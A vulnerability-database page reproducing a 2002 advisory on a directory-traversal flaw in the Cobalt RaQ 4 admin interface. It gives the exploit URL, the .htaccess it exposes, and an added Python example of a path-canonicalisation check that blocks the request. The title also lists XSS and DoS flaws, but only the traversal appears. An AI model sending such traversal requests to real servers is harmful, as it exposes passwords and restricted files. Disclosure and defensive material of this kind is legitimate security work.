PWNWIK.COM == a free, open vulnerability database that anyone can edit
INFO
------oOo----------------
Cobalt RAQ 4 Server Management: Cross Site Scripting, Directory Traversal & DoS Vulnerabilities.
------oOo----------------

Company Affected: www.cobalt.com & www.sun.com
Version: RAQ 4 Server Management.
Download: http://www.cobalt.com/products/raq/index.html
OS Affected: Linux ALL, Solaris ALL.
Author:

** Alex Hernandez <email protected>
** Thanks to all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

----=Brief Description=------------

Traversal File configuration.

Exploit:

http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

The default directory on the server is: "/usr/admserv/html/.cobalt/admin"
The path can be changed to any other directory to capture restricted files, passwords and user profiles.

Vendor Response:

The vendor was notified.
Posted to Cobalt security lists: email protected & email protected
http://www.cobalt.com

Alex Hernandez <email protected> (c) 2002.
------oOo------------------------------------
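
Added example (not part of the original advisory, and not Cobalt or Sun code): a sketch of the check that stops this class of request, placed beside the weak pattern it replaces. The advisory does not say how the RaQ admin server maps URLs to files; the prefix policy, the function names and the index.html sample are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/usr/admserv/html"          # docroot taken from the advisory's default directory
ALLOWED_PREFIX = "/.cobalt/sysManage/"  # assumption: the area the caller may read
ADVISORY_PATH = "/.cobalt/sysManage/../admin/.htaccess"  # path part of the advisory URL


def naive_allows(raw_path: str) -> bool:
    """Weak pattern: prefix test on the raw URL, before '..' is resolved."""
    return raw_path.startswith(ALLOWED_PREFIX)


def canonical_url_path(raw_path: str) -> str:
    """Percent-decode once, then collapse '.' and '..' segments."""
    decoded = unquote(raw_path)
    if "\x00" in decoded or "\\" in decoded:
        raise PermissionError("illegal character in path")
    return posixpath.normpath("/" + decoded.lstrip("/"))


def check_request(raw_path: str) -> str:
    """Return the file to serve, or raise PermissionError."""
    canon = canonical_url_path(raw_path)
    # Decide on the canonical path, the same one the filesystem will see.
    if not (canon + "/").startswith(ALLOWED_PREFIX):
        raise PermissionError(f"{canon} is outside {ALLOWED_PREFIX}")
    # Apache control files (.htaccess, .htpasswd) are never content.
    if posixpath.basename(canon).startswith(".ht"):
        raise PermissionError("server control file requested")
    return posixpath.join(DOC_ROOT, canon.lstrip("/"))


if __name__ == "__main__":
    # Constructed sample requests: the advisory path and one ordinary page.
    for path in (ADVISORY_PATH, "/.cobalt/sysManage/index.html"):
        try:
            print(path, "->", check_request(path))
        except PermissionError as exc:
            print(path, "-> denied:", exc)
```

The raw-prefix test accepts the advisory path because the string still begins with the allowed area; the canonical form, /.cobalt/admin/.htaccess, does not.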